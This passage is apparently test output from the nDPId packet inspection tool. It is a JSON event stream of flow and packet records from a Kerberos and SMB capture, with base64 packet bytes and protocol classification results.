-00696{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1549337952281,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"thread_ts_msec":1549337952281,"pkt":"AAgCHEeupB9ywglqCABFAADbFApAAIAGfSGsEAgIrBAIyQBYwCubyT2Ifrnt1lAYAQDVagAATQg2IahlDr4Do2rw09NPfPwlJMuv1fJJCc5mjToXHNxo9crR1AT1CMr5O+bZxtqN6M9uCaNjeNur9XwIFCnpBuL05RtGDqn2i9hJpKd+E88QIO6v0xwHDv6iGr\/8TVgkK3vs2tcuY57O8+c4l9vRR7jejS5ww2dQZlIjb\/CCYROJuvRqA0LHwqGM0CcXmUposD8ISy568tJuLRICL3GBKJj5gtDiSRwMYGKFzsxgs2+QN48="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337952282,"flow_last_seen":1549337952282,"flow_idle_time":7440000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":1,"thread_ts_msec":1549337952282,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49196,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1549337952282,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1549337952282,"pkt":"pB9ywglqAAgCHEeuCABFAABLAUpAAIAGkHGsEAjJrBAICMAsAFiP2F5aCFrVJ1AYAQB5GAAAR6URGA8yMDM3MDkxMzAyNDgwNVqnBgIEXbhyJqgFMAMCARI="} -00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1549337952282,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"thread_ts_msec":1549337952282,"pkt":"AAgCHEeupB9ywglqCABFAABYFBBAAIAGfZ6sEAgIrBAIyQBYwCwIWtrbj9hefVAYAQDaWgAAkAFNdIHXOvUSiNrRZ37a2E9NpclNBTiyKWuPGcwkWc2OKSpCtzAbfs9v1WRIgz2U"} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":76,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337952282,"flow_last_seen":1549337952282,"flow_idle_time":7440000,"flow_min_l4_payload_len":356,"flow_max_l4_payload_len":356,"flow_tot_l4_payload_len":356,"flow_avg_l4_payload_len":356,"midstream":1,"thread_ts_msec":1549337952282,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49194,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00939{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1549337952282,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":410,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":410,"pkt_l4_len":376,"thread_ts_msec":1549337952282,"pkt":"pB9ywglqAAgCHEeuCABFAAGMAVBAAIAGjyqsEAjJrBAICMAqAb0OVvT1RRDYGlAYAP+BiQAAx2oDxasXfLBTEcjz3tABELHnmrS3ZANlrcp\/hNjXtg\/fwYTBDdsdTzX+XDaW+uv3s2\/LBkJPP0K4Dy0YU3CzKo3pfb0515XvBfsBO7Ma0iP8tOV8txynjcFaEQvYkdi2SQ6bebHRRKNuECPHoWmL3h9GQAZAb4a73kOXQ+HdWdMxxkSNni5ZeogFxLOO9R2cL7EvadD9j700FIRXk1Ysly6p8QSOxUcF2BTlCAMMXraIVwnaJn4OFnBRV1kK62QzrTna4Mma6JSVzK\/6fCHORQn+FIHExUVoG3Vq1BveDwHtG0XGyIXhHabrgc6YQttz\/jzBPNDyI9ROMV3pQ0pZrTLzCjs+95mV\/WzyQTG\/SRF7u\/0NE9yZnVgk7HZw7F9bqd7MfX+aga2J6\/HQLbCChYzLyXsDW8WbBsbXh+XIiTyOIboYMLvBqY271GjiVoIyA7mbRvLsykMc7DElauDSPsA2vtc="} -00807{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1549337952283,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":314,"pkt_l4_len":280,"thread_ts_msec":1549337952283,"pkt":"AAgCHEeupB9ywglqCABFAAEsFBRAAIAGfMasEAgIrBAIyQG9wCpFENgaDlb2WVAYAP9XsAAAAAABAP5TTUJAAAEAAAAAAAEAHwAJAAAAAAAAAAEAAAAAAAAA\/\/4AAAAAAABhAAAAAAQAAFesIp3Ms9YkV3HyzmcNx+gJAAAASAC4AKGBtTCBsqADCgEAoQsGCSqGSIL3EgECAqKBnQSBmmCBlwYJKoZIhvcSAQICAgBvgYcwgYSgAwIBBaEDAgEPongwdqADAgESom8EbUXiUY0MYNrse7Xdy+nvFD1NZYMmVWsdodfXY9v69kCk+MLVD1Rqj48zpMQyXFgAZRbdNaLq\/lZFH5cVcwmZOZp6PzJLHFRz2Ys9FBPKwjMkCOL5scijYfadSqIU\/eT7q\/ACDBFzzf8MmsOdu9E="} -00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1549337930219,"flow_last_seen":1549337951711,"flow_idle_time":7440000,"flow_min_l4_payload_len":220,"flow_max_l4_payload_len":375,"flow_tot_l4_payload_len":1682,"flow_avg_l4_payload_len":280,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49165,"dst_port":49155,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1549337930219,"flow_last_seen":1549337951711,"flow_idle_time":7440000,"flow_min_l4_payload_len":220,"flow_max_l4_payload_len":375,"flow_tot_l4_payload_len":1682,"flow_avg_l4_payload_len":280,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49165,"dst_port":49155,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1549337940432,"flow_last_seen":1549337940433,"flow_idle_time":7440000,"flow_min_l4_payload_len":220,"flow_max_l4_payload_len":359,"flow_tot_l4_payload_len":863,"flow_avg_l4_payload_len":287,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49185,"dst_port":49155,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1549337940432,"flow_last_seen":1549337940433,"flow_idle_time":7440000,"flow_min_l4_payload_len":220,"flow_max_l4_payload_len":359,"flow_tot_l4_payload_len":863,"flow_avg_l4_payload_len":287,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49185,"dst_port":49155,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929790,"flow_last_seen":1549337929790,"flow_idle_time":7440000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49157,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929811,"flow_last_seen":1549337929812,"flow_idle_time":7440000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":431,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49158,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00707{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929815,"flow_last_seen":1549337929815,"flow_idle_time":7440000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49159,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}} -00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929815,"flow_last_seen":1549337929815,"flow_idle_time":7440000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49159,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1549337929816,"flow_last_seen":1549337929816,"flow_idle_time":7440000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":2875,"flow_avg_l4_payload_len":1437,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49160,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} -00707{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929981,"flow_last_seen":1549337929983,"flow_idle_time":7440000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49162,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}} -00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929981,"flow_last_seen":1549337929983,"flow_idle_time":7440000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49162,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337930192,"flow_last_seen":1549337930193,"flow_idle_time":7440000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49166,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337930214,"flow_last_seen":1549337930214,"flow_idle_time":7440000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":431,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49167,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00708{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337930217,"flow_last_seen":1549337930217,"flow_idle_time":7440000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49168,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}} -00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337930217,"flow_last_seen":1549337930217,"flow_idle_time":7440000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49168,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00706{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931198,"flow_last_seen":1549337931199,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":113,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":90,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49170,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931198,"flow_last_seen":1549337931199,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":113,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":90,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49170,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1549337931210,"flow_last_seen":1549337931211,"flow_idle_time":7440000,"flow_min_l4_payload_len":1432,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":2884,"flow_avg_l4_payload_len":1442,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49171,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} -00710{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931211,"flow_last_seen":1549337931213,"flow_idle_time":7440000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":1064,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":600,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49173,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}} -00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931211,"flow_last_seen":1549337931213,"flow_idle_time":7440000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":1064,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":600,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49173,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00708{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931218,"flow_last_seen":1549337931219,"flow_idle_time":7440000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49175,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}} -00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931218,"flow_last_seen":1549337931219,"flow_idle_time":7440000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49175,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1549337931219,"flow_last_seen":1549337931220,"flow_idle_time":7440000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":2875,"flow_avg_l4_payload_len":1437,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49176,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} -00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937703,"flow_last_seen":1549337937703,"flow_idle_time":7440000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49181,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937724,"flow_last_seen":1549337937724,"flow_idle_time":7440000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":431,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49182,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00705{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937725,"flow_last_seen":1549337937726,"flow_idle_time":7440000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49183,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937725,"flow_last_seen":1549337937726,"flow_idle_time":7440000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49183,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00708{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337940431,"flow_last_seen":1549337940432,"flow_idle_time":7440000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49186,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}} -00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337940431,"flow_last_seen":1549337940432,"flow_idle_time":7440000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49186,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337951630,"flow_last_seen":1549337951631,"flow_idle_time":7440000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":240,"flow_tot_l4_payload_len":475,"flow_avg_l4_payload_len":237,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49187,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337951638,"flow_last_seen":1549337951638,"flow_idle_time":7440000,"flow_min_l4_payload_len":162,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":477,"flow_avg_l4_payload_len":238,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49188,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00705{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337951639,"flow_last_seen":1549337951639,"flow_idle_time":7440000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49189,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337951639,"flow_last_seen":1549337951639,"flow_idle_time":7440000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49189,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00708{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337951709,"flow_last_seen":1549337951710,"flow_idle_time":7440000,"flow_min_l4_payload_len":190,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":407,"flow_avg_l4_payload_len":203,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49190,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}} -00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337951709,"flow_last_seen":1549337951710,"flow_idle_time":7440000,"flow_min_l4_payload_len":190,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":407,"flow_avg_l4_payload_len":203,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49190,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 